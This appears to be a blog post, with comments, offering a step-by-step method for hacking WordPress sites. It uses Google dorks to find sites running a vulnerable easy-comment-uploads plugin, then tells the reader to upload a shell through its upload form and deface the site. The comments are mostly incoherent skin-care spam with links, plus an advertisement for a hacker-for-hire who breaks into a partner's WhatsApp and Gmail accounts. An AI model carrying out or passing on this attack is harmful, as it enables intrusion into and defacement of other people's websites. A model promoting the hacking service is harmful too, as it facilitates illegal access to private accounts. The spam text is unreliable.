WORDPRESS EXPLOIT

You Can Hack Thousands of WordPress Websites With This Exploit.
And Thousands of WordPress websites Are Vulnerable For This Attack

Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


Step 1
Open Google.com and Enter Any One Google Dork which Given,

Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….

Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere

5 (mga) komento

I'm certain that there is more to say, but I'll let someone else talk about it. Those charges can run up if you're not careful. The argument they made could hardly be stronger yet it is issued by the
government. nutra platform Anti Aging is a wonderful way to combine six traditions. I've got novellas of wonderful words in regard to skin cream. We've been backed up. Skin Care was doing all the work. By the way, "An apple a day keeps the doctor away." Please check into this. Wow - Skin Care rocks! There are a few in betweens here.
https://www.nutraplatform.com/

Reply

I'm kind of a hard nose. The only remedy I know of is Anti Aging. Anti Aging cannot be relied on. Maybe one day I'll understand.It turns out that there are uncommon practices that underlie skin cream. How sad is that. At first, I did not know how to begin. The scheme is the same for both Botox treatment and skin cream. Anti Aging news also can be obtained from the government. Read my lips, this isn't the case. Skin cream is one of the best available.
https://www.nutraplatform.com/

Reply

This is why everything in our world today has to have instant
gratification at the click of a mouse. If you like Anti Aging, you are in pretty good shape. virilaxyn rx It is how to keep your spirit focused on Anti Aging. Consequently, fear this. I have several Anti Aging and This is how many persons on the street are promoting Skin Care. There are many points that got me here.
https://www.nutraplatform.com/virilaxyn-rx/

Reply
Hindi-nagpakilala mod

This is eye opning on security
Website

Reply

I Want to use this medium in appreciating cyber golden hacker , after being ripped off my money,he helped me find my cheating lover he helped me hack her WHATSAPP, GMAIL and kik and i got to know that he was cheating on me, in less than 24 hours he helped me out with everything, cybergoldenhacker is trust worthy and affordable contact him on: cybergoldenhacker at gmail dot com

Reply

Mag-post ng isang Komento